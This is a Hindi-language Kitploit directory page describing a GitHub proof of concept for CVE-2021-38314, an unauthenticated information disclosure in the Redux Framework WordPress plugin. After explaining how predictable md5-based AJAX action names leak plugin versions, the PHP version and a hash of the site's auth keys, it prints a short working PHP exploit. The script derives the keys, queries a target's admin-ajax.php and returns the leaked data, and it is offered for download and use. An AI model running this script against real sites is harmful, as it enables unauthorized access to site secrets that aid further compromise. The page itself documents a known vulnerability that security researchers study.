Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-38314 — cve-2021-38314 - अप्रमाणित संवेदनशील जानकारी का खुलासा | Kitploit
उपकरण/GitHubGitHub/twseptian/cve-2021-38314
टोहीभेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubtwseptian/cve-2021-38314

cve-2021-38314

cve-2021-38314 - अप्रमाणित संवेदनशील जानकारी का खुलासा

रिपॉजिटरी देखें
2114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

cve-2021-38314 - अप्रमाणित संवेदनशील जानकारी का खुलासा

Gutenberg Template Library और Redux Framework प्लगइन <= 4.2.11 WordPress के लिए, redux-core/class-redux-core.php में includes फ़ंक्शन में कई AJAX क्रियाएं पंजीकृत थीं जो अप्रमाणित उपयोगकर्ताओं के लिए उपलब्ध थीं। ये क्रियाएं किसी विशेष साइट के लिए अद्वितीय थीं, लेकिन नियतात्मक और पूर्वानुमानित थीं क्योंकि वे साइट URL के md5 हैश पर आधारित थीं, जिसमें '-redux' का ज्ञात नमक मान था, और पिछले हैश का md5 हैश जिसमें '-support' का ज्ञात नमक मान था। इन AJAX क्रियाओं का उपयोग सक्रिय प्लगइन्स और उनके संस्करणों, साइट के PHP संस्करण, और साइट के AUTH_KEY को SECURE_AUTH_KEY के साथ जोड़कर बिना नमक वाले md5 हैश को पुनः प्राप्त करने के लिए किया जा सकता था [1][2]

स्रोत कोड

root@kitploit:~
<?php
$target = "https://target.com";  
$key1 = md5("$target/-redux");
$key2 = file_get_contents("$target/wp-admin/admin-ajax.php?action=$key1");
$key3 = md5($key2. '-support');
$redux_code = file_get_contents("http://verify.redux.io/?hash=$key3&site=$target/");
echo file_get_contents("$target/wp-admin/admin-ajax.php?action=$key3&code=$redux_code");

.php एक्सटेंशन के साथ स्रोत कोड के रूप में सहेजें

कैसे चलाएं

उपयोग

संदर्भ:

  • [1] "CVE - CVE-2021-38314," Mitre.org, 2021. [ऑनलाइन]. उपलब्ध: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314. [पहुंच: 15 मई, 2022]
  • [2] Rizaldi Wahaz, "अप्रमाणित संवेदनशील जानकारी का खुलासा [संपादित]," Medium, 25 नवंबर, 2021. [ऑनलाइन]. उपलब्ध: https://wahaz.medium.com/unauthenticated-sensitive-information-disclosure-at-redacted-2702224098c. [पहुंच: 15 मई, 2022]
टूल डाउनलोड करें